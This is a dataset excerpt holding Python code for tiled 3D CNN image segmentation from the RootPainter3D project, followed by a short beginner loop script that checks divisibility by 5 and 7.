def ensemble_segment_3d(model_paths, image, fname, batch_size, in_w, out_w, in_d,
                        out_d, classes):
    """ Average predictions from each model specified in model_paths """
    # NOTE(review): despite the docstring, only model_paths[0] is loaded --
    # no averaging across models happens here; confirm intent.
    # NOTE: fname and height_diff are currently unused.
    t = time.time()
    input_image_shape = image.shape
    cnn = load_model(model_paths[0], classes)
    in_patch_shape = (in_d, in_w, in_w)
    out_patch_shape = (out_d, out_w, out_w)
    # Per-axis size difference between the network's input and output patches.
    depth_diff = in_patch_shape[0] - out_patch_shape[0]
    height_diff = in_patch_shape[1] - out_patch_shape[1]
    width_diff = in_patch_shape[2] - out_patch_shape[2]
    # pad so seg will be size of input image
    image = im_utils.pad_3d(image, width_diff//2, depth_diff//2,
                            mode='reflect', constant_values=0)
    # segment returns a series of prediction maps. one for each class.
    pred_maps = segment_3d(cnn, image, batch_size, in_patch_shape, out_patch_shape)
    assert pred_maps[0].shape == input_image_shape
    print('time to segment image', time.time() - t)
    return pred_maps
def segment_3d(cnn, image, batch_size, in_tile_shape, out_tile_shape):
    """
    Tile *image*, run *cnn* on batches of tiles, and stitch the per-tile
    predictions back into full maps.

    in_tile_shape and out_tile_shape are (depth, height, width)

    Returns a list with one binary (int) prediction map per class; each
    map covers the image minus the input/output tile-size difference.
    """
    # Return prediction for each pixel in the image
    # The cnn will give a the output as channels where
    # each channel corresponds to a specific class 'probability'
    # don't need channel dimension
    # make sure the width, height and depth is at least as big as the tile.
    assert len(image.shape) == 3, str(image.shape)
    assert image.shape[0] >= in_tile_shape[0], f"{image.shape[0]},{in_tile_shape[0]}"
    assert image.shape[1] >= in_tile_shape[1], f"{image.shape[1]},{in_tile_shape[1]}"
    assert image.shape[2] >= in_tile_shape[2], f"{image.shape[2]},{in_tile_shape[2]}"
    # The output tile is smaller than the input tile, so the stitched
    # output shrinks by the difference along each axis.
    depth_diff = in_tile_shape[0] - out_tile_shape[0]
    width_diff = in_tile_shape[1] - out_tile_shape[1]
    out_im_shape = (image.shape[0] - depth_diff,
                    image.shape[1] - width_diff,
                    image.shape[2] - width_diff)
    # Coordinates of every output tile needed to cover the output volume.
    coords = im_utils.get_coords_3d(out_im_shape, out_tile_shape)
    coord_idx = 0
    class_output_tiles = None # list of tiles for each class
    while coord_idx < len(coords):
        # Gather up to batch_size input tiles for one forward pass.
        tiles_to_process = []
        coords_to_process = []
        for _ in range(batch_size):
            if coord_idx < len(coords):
                coord = coords[coord_idx]
                x_coord, y_coord, z_coord = coord
                tile = image[z_coord:z_coord+in_tile_shape[0],
                             y_coord:y_coord+in_tile_shape[1],
                             x_coord:x_coord+in_tile_shape[2]]
                # need to add channel dimension for GPU processing.
                tile = np.expand_dims(tile, axis=0)
                assert tile.shape[1] == in_tile_shape[0], str(tile.shape)
                assert tile.shape[2] == in_tile_shape[1], str(tile.shape)
                assert tile.shape[3] == in_tile_shape[2], str(tile.shape)
                tile = img_as_float32(tile)
                tile = im_utils.normalize_tile(tile)
                coord_idx += 1
                tiles_to_process.append(tile) # need channel dimension
                coords_to_process.append(coord)
        tiles_to_process = np.array(tiles_to_process)
        tiles_for_gpu = torch.from_numpy(tiles_to_process)
        tiles_for_gpu = tiles_for_gpu.cuda()
        # TODO: consider use of detach.
        # I might want to move to cpu later to speed up the next few operations.
        # I added .detach().cpu() to prevent a memory error.
        # pad with zeros for the annotation input channels
        # l,r, l,r, but from end to start w w h h d d, c, c, b, b
        tiles_for_gpu = F.pad(tiles_for_gpu, (0, 0, 0, 0, 0, 0, 0, 2), 'constant', 0)
        # tiles shape after padding torch.Size([4, 3, 52, 228, 228])
        outputs = cnn(tiles_for_gpu).detach().cpu()
        # bg channel index for each class in network output
        # (each class owns a [bg, fg] channel pair).
        class_idxs = [x * 2 for x in range(outputs.shape[1] // 2)]
        if class_output_tiles is None:
            class_output_tiles = [[] for _ in class_idxs]
        for i, class_idx in enumerate(class_idxs):
            class_output = outputs[:, class_idx:class_idx+2]
            # class_output : (batch_size, bg/fg, depth, height, width)
            softmaxed = softmax(class_output, 1)
            foreground_probs = softmaxed[:, 1] # just the foreground probability.
            predicted = foreground_probs > 0.5
            predicted = predicted.int()
            pred_np = predicted.data.cpu().numpy()
            for out_tile in pred_np:
                class_output_tiles[i].append(out_tile)
    class_pred_maps = []
    for i, output_tiles in enumerate(class_output_tiles):
        # reconstruct for each class
        reconstructed = im_utils.reconstruct_from_tiles(output_tiles,
                                                        coords, out_im_shape)
        class_pred_maps.append(reconstructed)
    return class_pred_maps
| YZST/RootPainter3D | trainer/model_utils.py | model_utils.py | py | 8,983 | python | en | code | null | github-code | 36 |
#!/usr/bin/python3
# Print the numbers 1..39 and report divisibility by 5 and/or 7.
i = 1  # start from 1
while i < 40:
    print(i)  # print the current number
    if i % 5 == 0 and i % 7 == 0:  # check this first, otherwise only "divided by 5" would be reported
        print("x is divided by 5 and 7")
    elif i % 5 == 0:  # is the remainder of the division zero
        print("x is divided by 5")
    elif i % 7 == 0:
        print("x is divided by 7")
    elif i == 13:
        i=i+1  # advance the loop counter when i is 13
        continue  # skip classifying 13 (NOTE: 13 itself was already printed above)
    elif i % 5 != 0 and i % 7 != 0:  # != means "not equal" (the opposite of ==)
        print("x is not important")
    i=i+1  # advance the loop counter
input()  # keep the console window open until Enter is pressed
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.